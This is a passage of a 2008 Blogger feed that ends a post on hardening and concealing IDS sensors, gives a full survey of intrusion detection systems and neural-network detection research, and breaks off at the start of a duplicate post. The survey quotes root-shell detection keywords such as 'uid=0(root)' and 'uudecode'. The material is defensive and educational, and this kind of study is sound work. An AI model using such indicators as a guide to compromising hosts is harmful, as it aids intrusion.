knowledge this is not possible without physical access.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;NOTE: I would advise against applying this principle to twisted pair Ethernet cabling. After some frustration and several support calls to equipment manufacturers, you will soon discover that most twisted pair devices will not produce a link when the transmit pair is cut as there are line verification routines within most modern enterprise-grade interconnection equipment (&lt;i&gt;e.g.&lt;/i&gt;, hubs, switches). Rumor has it that this configuration is possible with 10/100BaseT, although it may not be worth the potential sacrifice of your data’s integrity. Several 10Base5 NICs are still commercially available, as are AUI transceiver modules for hubs (&lt;i&gt;e.g.&lt;/i&gt;, the 3Com 3C1206-0).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS sensors are potentially as valuable a resource (if not more so) as the network elements they serve to protect. Patch levels should be kept current, and routines should be implemented to reduce the volume of log data that accumulates on the sensors. Where possible, efforts should be taken to conceal the very existence of sensors as the information they contain could contribute significantly to the compromise of several additional systems. In short, recognize the IDS as an asset with significant potential for either network protection &lt;u&gt;or&lt;/u&gt; compromise and defend it accordingly.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-373113958723101675?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/373113958723101675/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=373113958723101675' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/373113958723101675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/373113958723101675'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/evading-passive-sniffer-detection-with.html' title='Evading Passive Sniffer Detection With IDS Sensors'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4964442673905788038</id><published>2008-03-25T11:58:00.001-07:00</published><updated>2008-03-31T20:16:44.139-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Application of Neural Networks to Intrusion Detection</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Introduction&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems ( IDS ) are now mainly employed to secure company networks. Ideally, an IDS has the capacity to detect in real-time all ( attempted ) intrusions, and to execute work to stop the attack ( for example, modifying firewall rules ). We present in this paper a « state of the art » of Intrusion Detection Systems, developing commercial and research tools, and a new way to improve false-alarm detection using Neural Network approach. This approach is still in development, nevertheless it seems to be very promising for the future.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This paper is organized as follows : first, we present the global architecture of IDS and a few commercially available tools, then we analyze new axes of research to improve IDS’s performances and particularly the application of Neural Networks to Intrusion Detection.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Classification of Intrusion Detection Systems&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A guidance document on Intrusion Detection Systems is available from National Institute of Standards and Technology ( NIST ) organization [1].&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems can be classified into three categories :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;host-based IDS, evaluate information found on a      single or multiple host systems, including contents of operating systems,      system and application files.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;network-based IDS, evaluate information captured      from network communications, analyzing the stream of packets traveling      across the network. Packets are captured through a set of sensors.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;vulnerability-assessment IDS, detect      vulnerabilities on internal networks and firewalls&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;There are two primary models to analyzing events to detect attacks:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;misuse detection model : IDS detect      intrusions by looking for activity that corresponds to known signatures of      intrusions or vulnerabilities&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;anomaly detection model : IDS detect      intrusions by searching « abnormal » network traffic&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Most IDS commercial tools refer to the misuse detection model, and signatures of intrusions must always be updated by vendors.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;IDS based on anomaly detection model have the ability to detect symptoms of attacks without specifying model of attacks, but they are very sensitive to false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Commercially available tools&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;Jackson&lt;/st1:city&gt;&lt;/st1:place&gt; [2] of Los Alamos National Laboratory wrote a complete survey of IDS products. Characteristics for each of the seventeen products are studied according to nine major features :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;suitability for IDS architecture and management      scheme&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;flexibility of adaptation for a specific network      to be monitored&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;protection against malicious tampering&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;interoperability with other network management      and security tools&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;comprehensiveness, to expand the concept of      intrusion detection such as blocking Java applets or Active-X controls,      monitoring e-mail content, blocking specific urls&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;event management, such as managing and reporting      event trace, updating attack database&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;active response when an attack occurs, such as      firewall or router reconfiguration&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;support for product&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Another recent market survey of commercially available Intrusion Detection tools today is available in [3]. We present here examples of IDS tools, classified according to the three models : host-based, network-based and vulnerability-assessment tools&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Host-based IDS systems detect attacks for an individual system, using system logs and operating system audit trials. Examples of well known host-based commercial tools are : Cybercop from Network Associates ( NAI ) ( http://www.pgp.com ), KaneSecurity Monitor ( KSM ) from RSA Security ( http://www.rsasecuriy.com ). Tripwire ( http://www.tripwire.org ) is a specific tool to detect changes of administrative or user files on one server.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Network-based IDS systems detect attacks by capturing and analyzing network packets, from « sensors » placed at various points in a network. Examples of well known Network-based commercial tools are : RealSecure from Internet Security Scanner ( ISS ) ( http://www.iss.net ), Cisco Secure IDS or NetRanger from Cisco Systems ( ex Wheel Group Corporation ), Centrax from CyberSafe corporation, and Network Flight Recorder NFR&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A popular and freely-available Network-based IDS is Snort, a lightweight IDS ( http://www.snort.org )&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The main difficulty for Network-based IDS is to process in real-time all packets for a large network ; specific hardware solutions may be employed. Another problem is segmentation of networks by switches which involve difficulties in capturing traffic for a global network.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Vulnerability-assessment tools are security scanners used to detect known vulnerabilities on specific Operating System’s configuration. Examples of well-known vulnerability-assessment tools are : CyberCop Scanner from PGP Security ( a Network Associates Division ) and SecureScan NX from Networks Vigilance ( formally known as NV e-secure ).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A freely-available vulnerability-assessment tool is Nessus, a Linux-based vulnerability scanner ( http://www.nessus.org ) written by R. Deraison&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performances for commercial tools&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The majority of tools available today refer to the misuse detection model, meaning that administrators need to regularly update vulnerabilities database. Then, all these tools are vulnerable to new signatures of attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Tools are also very sensitive to false attacks, corresponding to normal network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Major commercial IDS do not handle Fragmentation / re-assembly of IP packets. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For large networks, it would be necessary to store Gigabytes of event data every day, to treat them off-line.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Application of Neural Networks to Intrusion Detection&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The Center for Education and Research in Information Assurance and Security (CERIAS) has produced a review of IDS research prototypes [4], and a few are now commercial products.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for misuse detection &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for the misuse detection model are :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;expert systems, containing a set of rules that      describe attacks&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;signature verification, where attack scenarios      are translated into sequences of audit events&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;petri nets, where known attacks are represented      with graphical petri nets&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;sate-transition diagrams, representing attacks      with a set of goals and transitions&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for misuse detection concerns « signature verification », where a system detects previously seen, known attacks by looking for an invariant signature left by these attacks. This signature is found in audit files, in host-intrused machine, or in sniffers looking for packets inside or outside of the attacked machine.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Limitation of this approach is due to :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;frequent false-alarm detection&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;the need to specify a signature of the attack,      and then to update signature of attacks on every IDS tool. A signature of      an attack may not be easily discovered.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;new attack signatures are not automatically      discovered without update of the IDS&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for anomaly detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Anomaly Detection in Network-based or Host-based IDS includes :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;threshold detection detecting abnormal      activity on the server or network, for example abnormal consumption of the      CPU for one server, or abnormal saturation of the network&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;statistical measures, learned from historical      values&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;rule-based measures, with expert systems&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;non-linear algorithms such as Neural Networks or      Genetic algorithms&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for anomaly detection concerns the statistical analysis, where the user or the system behavior is measured by a number of variables over the time. These variables may be the login and the logout time of each session, the amount of resources consumed during the session, and the resource duration. The major limitation of this approach is to find a correct threshold without frequent false-alarm detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;DARPA Intrusion Detection Data Base&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;To improve performances of IDS systems with real network traffic, a large-scale realistic Intrusion Detection data-base has been sponsored by the US Defense Advanced Research Projects Agency ( DARPA ) in 1998. More than two months of traffic observed from US Government sites and the Internet were registered, adding attacks against various hosts OS. DARPA data-base was then designed to evaluate performances of Intrusion Detection Systems. The first evaluation with off-line and real-time Data Base was conducted in the summer of 1998 [5].&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach for Intrusion Detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;One promising research in Intrusion Detection concerns the application of the Neural Network techniques, for the misuse detection model and the anomaly detection model. Performance evaluations presented in this paper all refer to the DARPA Intrusion Data Base.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;strong&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;An artificial Neural Network consists of a collection of treatments to transform a set of inputs to a set of searched outputs, through a set of simple processing units, or nodes and connections between them. Subsets of the units are input nodes, output nodes, and nodes between input and output form hidden layers ; the connection between two units has some weight, used to determine how much one unit will affect the other. Two types of architecture of Neural Networks can be distinguished :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Supervised training algorithms, where in the      learning phase, the network learns the desired output for a given input or      pattern. The well known architecture of supervised neural network is the      Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern      Recognition problems.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unsupervised training algorithms, where in the      learning phase, the network learns without specifying desired output.      Self-Organizing Maps ( SOM ) are popular unsupervised training      algorithms ; a SOM tries to find a topological mapping from the input      space to clusters. SOM are employed for classification problems.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A good introduction to Neural Networks is available in [6]. The most important property of a Neural Network is to automatically learn / retrain coefficients in the Neural Network according to data inputs and data outputs. Applying the Neural Network (NN) approach to Intrusion Detection, we first have to expose NN to normal data and to attacks to automatically adjust coefficients of the NN during the training phase. Performance tests are then conducted with real network traffic and attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Networks have been largely employed with success for complex problems such as Pattern Recognition, hand-written character recognition, Statistical Analysis. We present four recent studies on the application of the Neural Network approach to the scope of Intrusion Detection, both for the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt; Representation of a Perceptron with one Hidden Layer ( from [8] )&lt;/span&gt;&lt;br /&gt;&lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Georgia University neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The MLP prototype had these characteristics : 4 fully connected layers, 9 input nodes and 2 output nodes ( normal and attack ). With this prototype, they simulated specific attacks as ISS scans, SATAN scans and SYNFlood, and each attack was clearly identified through normal traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A MLP/SOM prototype was then designed to detect dispersed and possibly collaborative attacks. Neural Network was a feed-forward network with back-propagation learning. In the learning phase, Neural Network converged rapidly. Preliminary results with unsuccessful FTP login attempts where correctly identified as attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;MIT research in neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;R Lippmann and R Cunningham [8, 9] of the MIT Lincoln Laboratory also conducted tests applying Neural Networks to misuse detection model, by searching for attack-specific keywords in the network traffic. They used a Multi-Level Perceptron (MLP) to detect Unix-host attacks, and attacks to obtain root-privilege on a server. Generic keywords are selected to detect attack preparations and actions executed after.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A two-layer perceptron was designed with k input nodes, 2k hidden nodes and 2 outputs ( normal and attack ) ; backpropagation in the learning phase detects weights of the Neural Network. Good detection performance was obtained with 30 keywords to detect attacks, such as « cat &gt; », « uudecode » or new root shell (« uid=0(root) », « bash# »).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Applied to Shell source code with 7 shell-commands representing an attack, 17 out of 20 attacks were detected and one false alarm generated ; applied to C source code with 2 features, 68 of 73 attacks were detected and 4 false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;With the Neural Network approach, false alarms were reduced by two orders of magnitude ( to roughly one false alarm per day ) and they increased the detection rate to roughly 80 % with the DARPA data base. System could detect old as well as new attacks not included in the training data, and in a lesser extent attacks distributed across multiple sessions.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;UBILAB Laboratory&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Luc Girardin of the UBILAB laboratory [ 10, 11] also employed Self-Organizing Maps ( SOM ) to perform clustering of network traffic and detect attacks based upon Neural Network, associated with a visual approach of network traffic. SOM are employed to project network events on an appropriate 2D-space for visualization, and then they are displayed to the Network Administrator with a comprehensive view of traffic. Intrusions are then easily extracted from this view, by highlighting divergence from the norm with visual metaphors of network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Girardin tested this approach with success for the following attacks : IP spoofing, FTP password guessing, network scanning and network hopping ; log file systems are analyzed from firewalls. However, this approach needs a visual interpretation of network traffic by an administrator to detect attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Research of RST Corporation&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A Ghosh and A Schwartzbard [12] of Reliable Software Technologies Corp. used the Neural Network approach for the anomaly detection model by analyzing program behavior profiles for Intrusion Detection. Program behavior profiles are built by capturing system calls made by the program, to monitor the behavior of programs by noting irregularities in program behavior.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Their IDS was a single hidden layer Multi-Layer Perceptron (MLP) ; they also employed the so-called Lucky Bucket algorithm to keep in mind temporal memorization of recent abnormal events, by managing a counter : for a normal output, the counter tends to be zero, and for an anomaly the counter tends to be one.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performance for their system was tested with the DARPA data-base, including intrusive and non-intrusive sessions. Applied to anomaly detection, system detects with good performances known and new attacks ( 77 % of attacks where detected with 3 % of false alarms ), but application to misuse detection detects attacks with high false alarm rates, excluding usage for commercial use. In 1998, with the DARPA off-line IDS evaluation, the system successfully detected User-to-Root attacks composed of system-call sequences.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In order to improve the anomaly detection model, A Ghosh et al. [13] then tested Intrusion Detection to another topology of Neural Network, the Elman Network for recognizing recurrent features in program execution traces. An Elman Network is based on a feed-forward topology with the addition of context nodes retaining information from previous inputs. Applied to the DARPA database, the Elman Networks were able to detect 77 % of attacks with &lt;b&gt;no false alarm&lt;/b&gt;, improving results obtained with the MLP topology.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems are becoming largely employed as a fundamental Network Security system. Commercial tools available today have limitations in detecting real intrusions, and Neural Network is a efficient way to improve the performances of IDS systems which are based on the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-4964442673905788038?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4964442673905788038/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4964442673905788038' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4964442673905788038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4964442673905788038'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/application-of-neural-networks-to_25.html' title='Application of Neural Networks to Intrusion Detection'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8107702510982510456</id><published>2008-03-25T11:58:00.000-07:00</published><updated>2008-03-25T12:19:22.762-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Application of Neural Networks to Intrusion Detection</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Introduction&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems ( IDS ) are now mainly employed to secure company networks. Ideally, an IDS has the capacity to detect in real-time all ( attempted ) intrusions, and to execute work to stop the attack ( for example, modifying firewall rules ). We present in this paper a « state of the art » of 